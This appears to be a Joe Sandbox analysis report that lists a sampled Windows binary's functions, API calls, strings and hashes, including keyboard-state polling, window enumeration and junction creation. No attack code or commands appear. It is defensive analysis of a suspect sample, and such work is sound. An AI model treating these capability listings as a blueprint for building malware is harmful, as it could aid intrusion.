                                                                      • API String ID: 1234038744-3931177956
                                                                      • Opcode ID: a15f447b4b519d1c6dd953a3608a2e197ae55454f3615692f72e8623fb1b3437
                                                                      • Instruction ID: da466ba107a1c18f1dd2c70a2903df38b0f8eb784b8f2cc7c59c8cfd2896d783
                                                                      • Opcode Fuzzy Hash: a15f447b4b519d1c6dd953a3608a2e197ae55454f3615692f72e8623fb1b3437
                                                                      • Instruction Fuzzy Hash: 77D10531A00116DBDF009F66D88EB7DB7B5BF44700F1A845AF846ABA90DB30DD42EB61
                                                                      Function 00C5DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 00C5DAA1
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D659
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D66B
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D67D
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D68F
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D6A1
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D6B3
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D6C5
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D6D7
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D6E9
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D6FB
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D70D
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D71F
                                                                        • Part of subcall function 00C5D63C: _free.LIBCMT ref: 00C5D731
                                                                      • _free.LIBCMT ref: 00C5DA96
                                                                        • Part of subcall function 00C529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000), ref: 00C529DE
                                                                        • Part of subcall function 00C529C8: GetLastError.KERNEL32(00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000,00000000), ref: 00C529F0
                                                                      • _free.LIBCMT ref: 00C5DAB8
                                                                      • _free.LIBCMT ref: 00C5DACD
                                                                      • _free.LIBCMT ref: 00C5DAD8
                                                                      • _free.LIBCMT ref: 00C5DAFA
                                                                      • _free.LIBCMT ref: 00C5DB0D
                                                                      • _free.LIBCMT ref: 00C5DB1B
                                                                      • _free.LIBCMT ref: 00C5DB26
                                                                      • _free.LIBCMT ref: 00C5DB5E
                                                                      • _free.LIBCMT ref: 00C5DB65
                                                                      • _free.LIBCMT ref: 00C5DB82
                                                                      • _free.LIBCMT ref: 00C5DB9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      • Opcode ID: 12e6638aabe8b724da97c46a5a956aaf6a6aea27cbc480688573a489686c5d65
                                                                      • Instruction ID: 98bf967c841a294ae68ad0f7e3d3cfc61be9c9ff64cd0948d4a82f0e9ff190af
                                                                      • Opcode Fuzzy Hash: 12e6638aabe8b724da97c46a5a956aaf6a6aea27cbc480688573a489686c5d65
                                                                      • Instruction Fuzzy Hash: 83316F396043049FDB31AA39E845B9677E9FF11312F114419F86AE7291DF31ADC8E728
                                                                      Function 00C8365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C8369C
                                                                      • _wcslen.LIBCMT ref: 00C836A7
                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C83797
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C8380C
                                                                      • GetDlgCtrlID.USER32(?), ref: 00C8385D
                                                                      • GetWindowRect.USER32(?,?), ref: 00C83882
                                                                      • GetParent.USER32(?), ref: 00C838A0
                                                                      • ScreenToClient.USER32(00000000), ref: 00C838A7
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C83921
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00C8395D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                      • String ID: %s%u
                                                                      • API String ID: 4010501982-679674701
                                                                      • Opcode ID: 49c5855a136ae48770397d57f2a8ec48d98f1451519cca568c2b2bf43923066b
                                                                      • Instruction ID: 80e35009e4e4e7cbf2376e5048f4090f9feee18c43fed37c4fbd988a10a9bbf6
                                                                      • Opcode Fuzzy Hash: 49c5855a136ae48770397d57f2a8ec48d98f1451519cca568c2b2bf43923066b
                                                                      • Instruction Fuzzy Hash: 5C91E671204746AFD719EF24C885FAAF7A8FF44718F005629F9A9C2190DB30EB45CB95
                                                                      Function 00C84954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C84994
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00C849DA
                                                                      • _wcslen.LIBCMT ref: 00C849EB
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00C849F7
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C84A2C
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00C84A64
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00C84A9D
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00C84AE6
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C84B20
                                                                      • GetWindowRect.USER32(?,?), ref: 00C84B8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                      • String ID: ThumbnailClass
                                                                      • API String ID: 1311036022-1241985126
                                                                      • Opcode ID: 275f6ee072668a55df9646b6d2d8a28b3acf4570191b4fce7908947dc8c16830
                                                                      • Instruction ID: b31217c6463ee1b59dca2a95f5aa8b390f570e1d4a85be068b885f44fcf33fa5
                                                                      • Opcode Fuzzy Hash: 275f6ee072668a55df9646b6d2d8a28b3acf4570191b4fce7908947dc8c16830
                                                                      • Instruction Fuzzy Hash: 7291BF311042069FDB18EF14C985FBA77E8FF84318F04856AFD959A096EB30EE45CBA5
                                                                      Function 00CB8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CB8D5A
                                                                      • GetFocus.USER32 ref: 00CB8D6A
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00CB8D75
                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00CB8E1D
                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00CB8ECF
                                                                      • GetMenuItemCount.USER32(?), ref: 00CB8EEC
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00CB8EFC
                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00CB8F2E
                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00CB8F70
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CB8FA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                      • String ID: 0
                                                                      • API String ID: 1026556194-4108050209
                                                                      • Opcode ID: c5a26f549a10c12f6fa76bd171e9fb19621696e78924cedd366d73c1201a7831
                                                                      • Instruction ID: ee9bd0ab34af930ebbc613f079634e41d09c99a5dcafcf78a59df88cc3788266
                                                                      • Opcode Fuzzy Hash: c5a26f549a10c12f6fa76bd171e9fb19621696e78924cedd366d73c1201a7831
                                                                      • Instruction Fuzzy Hash: A381AF715083419FDB20CF24C884ABBBBEDFB88354F040A19F99497291DB70DA08DBA2
                                                                      Function 00C8BF30 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(00CF1990,000000FF,00000000,00000030), ref: 00C8BFAC
                                                                      • SetMenuItemInfoW.USER32(00CF1990,00000004,00000000,00000030), ref: 00C8BFE1
                                                                      • Sleep.KERNEL32(000001F4), ref: 00C8BFF3
                                                                      • GetMenuItemCount.USER32(?), ref: 00C8C039
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00C8C056
                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00C8C082
                                                                      • GetMenuItemID.USER32(?,?), ref: 00C8C0C9
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C8C10F
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C8C124
                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C8C145
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                      • String ID: 0
                                                                      • API String ID: 1460738036-4108050209
                                                                      • Opcode ID: d38b6c70d1c0ebae3f2d5823e692e984e6eccaf3d654872d087e5cb4eddb90f5
                                                                      • Instruction ID: fc9072ffa612c28161d8a4a1c682797ecf97410ef8714b2828cb965910930373
                                                                      • Opcode Fuzzy Hash: d38b6c70d1c0ebae3f2d5823e692e984e6eccaf3d654872d087e5cb4eddb90f5
                                                                      • Instruction Fuzzy Hash: 92619FB090025AAFDF21EF64DCC8FAE7BB8EB05348F140115E921A3292C735AE44DB75
                                                                      Function 00C8DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C8DC20
                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C8DC46
                                                                      • _wcslen.LIBCMT ref: 00C8DC50
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C8DCA0
                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C8DCBC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 1939486746-1459072770
                                                                      • Opcode ID: d536e1b073142a42bcc5fadf151fc9a8585d53b8adb85dfd822ca3d05172cb29
                                                                      • Instruction ID: 0840d4c0a48c065e2e1998865e147faf156a256cf6335b72960ace5208a214a6
                                                                      • Opcode Fuzzy Hash: d536e1b073142a42bcc5fadf151fc9a8585d53b8adb85dfd822ca3d05172cb29
                                                                      • Instruction Fuzzy Hash: 9141FF329402117BDB24BA65DC83EBF77ACEF55754F10006AF901A61C2EA749A01A7B9
                                                                      Function 00C93D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C93D40
                                                                      • _wcslen.LIBCMT ref: 00C93D6D
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C93D9D
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C93DBE
                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00C93DCE
                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C93E55
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C93E60
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C93E6B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 1149970189-3457252023
                                                                      • Opcode ID: 1108a67f9853bce7c90593cd0d3ca972b0f5caf7e895ad5957aa843b4f7fea1b
                                                                      • Instruction ID: 369f168465a81dc34bafe762a7e431c160b4f91144093f0797cfe8feda4f04aa
                                                                      • Opcode Fuzzy Hash: 1108a67f9853bce7c90593cd0d3ca972b0f5caf7e895ad5957aa843b4f7fea1b
                                                                      • Instruction Fuzzy Hash: 4E319EB6A14249ABDB219FA0DC89FEF37BCEF88700F1041B5F619D6160EB7497448B24
                                                                      Function 00C8E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 00C8E6B4
                                                                        • Part of subcall function 00C3E551: timeGetTime.WINMM(?,?,00C8E6D4), ref: 00C3E555
                                                                      • Sleep.KERNEL32(0000000A), ref: 00C8E6E1
                                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00C8E705
                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C8E727
                                                                      • SetActiveWindow.USER32 ref: 00C8E746
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C8E754
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C8E773
                                                                      • Sleep.KERNEL32(000000FA), ref: 00C8E77E
                                                                      • IsWindow.USER32 ref: 00C8E78A
                                                                      • EndDialog.USER32(00000000), ref: 00C8E79B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1194449130-3405671355
                                                                      • Opcode ID: e751979a428bc6245d7503509f512ad7ec5fd4944d365bccfb2daf216c92e334
                                                                      • Instruction ID: 6e9a50df8c48f90935c4d660259bca45b13b8a73973902909f6306b6ba212771
                                                                      • Opcode Fuzzy Hash: e751979a428bc6245d7503509f512ad7ec5fd4944d365bccfb2daf216c92e334
                                                                      • Instruction Fuzzy Hash: 86216DB0200644AFEB106F60ECC9F3E3B69E754B4DF111525F811C21B1DBB1AC04EB2A
                                                                      Function 00C8E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C8EA5D
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C8EA73
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C8EA84
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C8EA96
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C8EAA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_wcslen
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 2420728520-1007645807
                                                                      • Opcode ID: 7c2de9ea8402f4e987c881fe1e5cd7e118e76c0cf4fc99b1ff53edd84ae2d4ee
                                                                      • Instruction ID: 126b6e2cbb86363023c8b064fbaec6438a81ccff142f0e71385fd7698aeec1a1
                                                                      • Opcode Fuzzy Hash: 7c2de9ea8402f4e987c881fe1e5cd7e118e76c0cf4fc99b1ff53edd84ae2d4ee
                                                                      • Instruction Fuzzy Hash: B11137316A02B979D724F766DC4ADFF6A7CEBD1F44F400435B411A20D1DE705A45D6B0
                                                                      Function 00C89F91 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00C8A012
                                                                      • SetKeyboardState.USER32(?), ref: 00C8A07D
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00C8A09D
                                                                      • GetKeyState.USER32(000000A0), ref: 00C8A0B4
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00C8A0E3
                                                                      • GetKeyState.USER32(000000A1), ref: 00C8A0F4
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00C8A120
                                                                      • GetKeyState.USER32(00000011), ref: 00C8A12E
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00C8A157
                                                                      • GetKeyState.USER32(00000012), ref: 00C8A165
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00C8A18E
                                                                      • GetKeyState.USER32(0000005B), ref: 00C8A19C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: 5c9d9c2c87bf5d05273b9135caa17c4f21922c832d1da2aecdc68b08d16c96cb
                                                                      • Instruction ID: fe08d9c3b6220888ab726e00f7c7ca1adb1bdbbd1dcdd33fdcae32b5ec5f7ce0
                                                                      • Opcode Fuzzy Hash: 5c9d9c2c87bf5d05273b9135caa17c4f21922c832d1da2aecdc68b08d16c96cb
                                                                      • Instruction Fuzzy Hash: 7651EB309047886AFB35FBA048147FEAFB49F12348F0C459AD5D2571C2EA64AF4CC76A
                                                                      Function 00C85CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00C85CE2
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C85CFB
                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C85D59
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00C85D69
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C85D7B
                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C85DCF
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C85DDD
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C85DEF
                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C85E31
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00C85E44
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C85E5A
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00C85E67
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: b2243d9406abace523d4e7c4d531cf3bca236fbb29c0b166b8eec40aef8705da
                                                                      • Instruction ID: 23d0432077e33ef5bcf258d98c3ebf32dc41094ab10741f82274008b40aed4b8
                                                                      • Opcode Fuzzy Hash: b2243d9406abace523d4e7c4d531cf3bca236fbb29c0b166b8eec40aef8705da
                                                                      • Instruction Fuzzy Hash: 2151FE71A00605AFDF18DF68DD89BAEBBB9FB48305F148229F915E7290D7709E04CB54
                                                                      Function 00C38BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C38F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C38BE8,?,00000000,?,?,?,?,00C38BBA,00000000,?), ref: 00C38FC5
                                                                      • DestroyWindow.USER32(?), ref: 00C38C81
                                                                      • KillTimer.USER32(00000000,?,?,?,?,00C38BBA,00000000,?), ref: 00C38D1B
                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00C76973
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00C38BBA,00000000,?), ref: 00C769A1
                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00C38BBA,00000000,?), ref: 00C769B8
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C38BBA,00000000), ref: 00C769D4
